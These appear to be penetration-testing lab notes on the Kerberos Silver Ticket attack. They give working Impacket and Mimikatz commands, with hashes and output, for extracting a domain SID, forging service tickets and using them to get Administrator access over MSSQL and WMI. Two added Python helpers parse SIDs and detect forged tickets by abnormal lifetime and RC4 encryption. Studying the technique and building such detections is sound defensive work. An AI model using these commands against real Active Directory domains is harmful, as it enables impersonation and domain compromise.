Silver Ticket Attack

Ticketer

To generate a Silver Ticket we need three things:

  • NTLM Hash
  • DC SID
  • SPN

Getting NTLM Hash

To create a silver ticket we use the NTLM (NT) hash of the service account's password, not the cleartext password. If Kerberoasting gave us the cleartext password, we must hash it before using it to generate the silver ticket.

If we don't have the NTLM hash but we do have the password, we can generate the hash with this tool: NTLM Hash Generator (see Getting-NTLM-Hash).

Extracting DC SID

To create the ticket, we first need to obtain the so-called Security Identifier (SID) of the domain. A SID is a unique identifier for any object in Active Directory and has the following structure:

S-1-5-21-2536614405-3629634762-1218571035-1116

Within this structure, the SID begins with a literal “S” to identify the string as a SID, followed by a revision level (usually set to “1”), an identifier-authority value (often “5” within AD) and one or more subauthority values.

We can use the following command:

impacket-getPac scrm.local/ksimpson:ksimpson -targetUser Administrator

If we have already compromised a machine, we can obtain the SID of our current user with the whoami /user command and take the domain SID part from it (everything before the final subauthority, the RID). Let's try this on our Windows 10 client:

C:\>whoami /user

USER INFORMATION
----------------

User Name   SID
=========== ==============================================
corp\offsec S-1-5-21-1602875587-2787523311-2599479668-1103
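The following Python helper is an added example, not part of the original notes: it validates a SID string against the structure described above and splits a domain-account SID into the domain SID and the RID, so the domain SID can be pulled from whoami /user output programmatically. The WHOAMI_SAMPLE text is a copy of the output above, embedded as constructed input.

```python
import re

# Constructed sample: the `whoami /user` output shown above, embedded as input.
WHOAMI_SAMPLE = """\
USER INFORMATION
----------------

User Name   SID
=========== ==============================================
corp\\offsec S-1-5-21-1602875587-2787523311-2599479668-1103
"""

# S-<revision>-<identifier authority>-<one or more subauthorities>
SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")


def parse_sid(sid: str):
    """Split a SID string into (revision, identifier authority, [subauthorities])."""
    m = SID_RE.match(sid.strip())
    if not m:
        raise ValueError(f"not a SID: {sid!r}")
    revision = int(m.group(1))
    authority = int(m.group(2))
    subauthorities = [int(x) for x in m.group(3).split("-")[1:]]
    return revision, authority, subauthorities


def domain_sid(sid: str):
    """Return (domain SID, RID) for a domain SID or a domain-account SID.

    Domain SIDs have the shape S-1-5-21-<a>-<b>-<c>; account SIDs append a RID.
    Well-known SIDs such as S-1-5-18 (LocalSystem) carry no domain part and are rejected.
    """
    revision, authority, subs = parse_sid(sid)
    if revision != 1 or authority != 5 or not subs or subs[0] != 21 or len(subs) not in (4, 5):
        raise ValueError(f"not a domain SID: {sid!r}")
    domain = "S-1-5-21-" + "-".join(str(x) for x in subs[1:4])
    rid = subs[4] if len(subs) == 5 else None
    return domain, rid


def domain_sid_from_whoami(output: str):
    """Find the first account SID in `whoami /user` output and return (domain SID, RID)."""
    for line in output.splitlines():
        m = re.search(r"(S-1-5-21(?:-\d+){4})\s*$", line)
        if m:
            return domain_sid(m.group(1))
    raise ValueError("no domain account SID found in output")


if __name__ == "__main__":
    print(domain_sid_from_whoami(WHOAMI_SAMPLE))
```

The same helper accepts a bare domain SID (four subauthorities, no RID) such as the one passed to ticketer's -domain-sid, so it can be used to sanity-check that argument before running the tool.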

Getting the SPN

(The -k option is needed only if NTLM authentication is disabled.)

impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k -dc-ip dc1.scrm.local

Generating the Silver Ticket

impacket-ticketer

We can craft a ticket as follows:

impacket-ticketer -spn MSSQLSvc/dc1.scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -dc-ip dc1.scrm.local Administrator -domain scrm.local

Examples: Intelligence

impacket-getST

Another option is to craft it with this impacket tool:

sudo impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :fca9edf1c9fb8f031dfc38d918279642

Examples: Intelligence

Using ticket with any impacket utility

impacket-mssqlclient

We point KRB5CCNAME at the generated Administrator.ccache file so that any impacket utility picks it up:

export KRB5CCNAME=Administrator.ccache

As shown below:

impacket-mssqlclient dc1.scrm.local -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL>

Examples: [[Scramble#^ac1e1e]]

impacket-wmiexec

Then we can run impacket-wmiexec with the ticket to access the machine:

export KRB5CCNAME=Administrator.ccache
impacket-wmiexec -k -no-pass dc.intelligence.htb
C:\>whoami
intelligence\administrator

Resources: Silver Ticket explanation by S4vitar (minute 1:20:00): Silver-Ticket-Attack

Mimikatz

An additional option is to load the silver ticket to memory with mimikatz as follows:

mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz # kerberos::list

mimikatz # kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:E2B475C11DA2A0748290D87AA966C327 /ptt
User      : offsec
Domain    : corp.com (CORP)
SID       : S-1-5-21-1602875587-2787523311-2599479668
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: e2b475c11da2a0748290d87aa966c327 - rc4_hmac_nt
Service   : HTTP
Target    : CorpWebServer.corp.com
Lifetime  : 13/02/2018 10.18.42 ; 11/02/2028 10.18.42 ; 11/02/2028 10.18.42
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'offsec @ corp.com' successfully submitted for current session

mimikatz # kerberos::list

[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 13/02/2018 10.18.42 ; 11/02/2028 10.18.42 ; 11/02/2028 10.18.42
   Server Name       : HTTP/CorpWebServer.corp.com @ corp.com
   Client Name       : offsec @ corp.com
   Flags 40a00000    : pre_authent ; renewable ; forwardable ;

Now that the ticket is loaded into memory, we can interact with the service and access any information allowed by the group memberships we put in the silver ticket. Depending on the type of service, it might also be possible to obtain code execution.
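Two properties of the listing above stand out from the defender's side: a service ticket that stays valid for ten years (the default domain policy "Maximum lifetime for service ticket" is 600 minutes) and RC4 encryption in a domain that would normally issue AES tickets. The following Python is an added example, not from the page or from mimikatz, that parses kerberos::list-style output, embedded below as a constructed copy of the listing above, and flags both anomalies. The 10-hour threshold and the weak-etype list are assumptions that a real check would align with the domain's actual policy.

```python
import re
from datetime import datetime

# Constructed sample: a copy of the kerberos::list output shown above.
KLIST_SAMPLE = """\
[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 13/02/2018 10.18.42 ; 11/02/2028 10.18.42 ; 11/02/2028 10.18.42
   Server Name       : HTTP/CorpWebServer.corp.com @ corp.com
   Client Name       : offsec @ corp.com
   Flags 40a00000    : pre_authent ; renewable ; forwardable ;
"""

# Assumed policy values: default "Maximum lifetime for service ticket" is 600 minutes,
# and a domain that has moved to AES should not be presenting RC4/DES service tickets.
MAX_SERVICE_TICKET_HOURS = 10
WEAK_ETYPES = ("rc4_hmac_nt", "rc4_hmac_nt_exp", "des_cbc_crc", "des_cbc_md5")
TIME_FMT = "%d/%m/%Y %H.%M.%S"  # day-first format, as printed in the listing above


def parse_tickets(text: str):
    """Parse kerberos::list-style output into a list of ticket dicts."""
    tickets, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        head = re.match(r"\[(\w+)\] - (0x[0-9a-fA-F]+) - (\S+)", line)
        if head:
            current = {"index": head.group(1), "etype": head.group(3)}
            tickets.append(current)
            continue
        if current is None or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "Start/End/MaxRenew":
            start, end, renew = (datetime.strptime(p.strip(), TIME_FMT) for p in value.split(";"))
            current.update(start=start, end=end, renew=renew)
        elif key == "Server Name":
            current["server"] = value
        elif key == "Client Name":
            current["client"] = value
        elif key.startswith("Flags"):
            current["flags"] = [f.strip() for f in value.split(";") if f.strip()]
    return tickets


def lifetime_hours(ticket) -> float:
    """Validity window of the ticket in hours (end minus start)."""
    return (ticket["end"] - ticket["start"]).total_seconds() / 3600


def assess(ticket):
    """Return a list of human-readable anomalies for one ticket."""
    findings = []
    hours = lifetime_hours(ticket)
    if hours > MAX_SERVICE_TICKET_HOURS:
        findings.append(
            f"lifetime of {hours / 24:.0f} days exceeds the {MAX_SERVICE_TICKET_HOURS}h service-ticket maximum"
        )
    if ticket["etype"] in WEAK_ETYPES:
        findings.append(f"weak encryption type {ticket['etype']}")
    return findings


if __name__ == "__main__":
    for t in parse_tickets(KLIST_SAMPLE):
        print(t["server"], "->", assess(t) or ["no anomalies"])
```

The same two checks apply to the output of klist on a Windows host; a forged ticket never passes through the KDC, so the domain controller has no matching 4769 event for it, and the abnormal lifetime on the client side is often the only local trace.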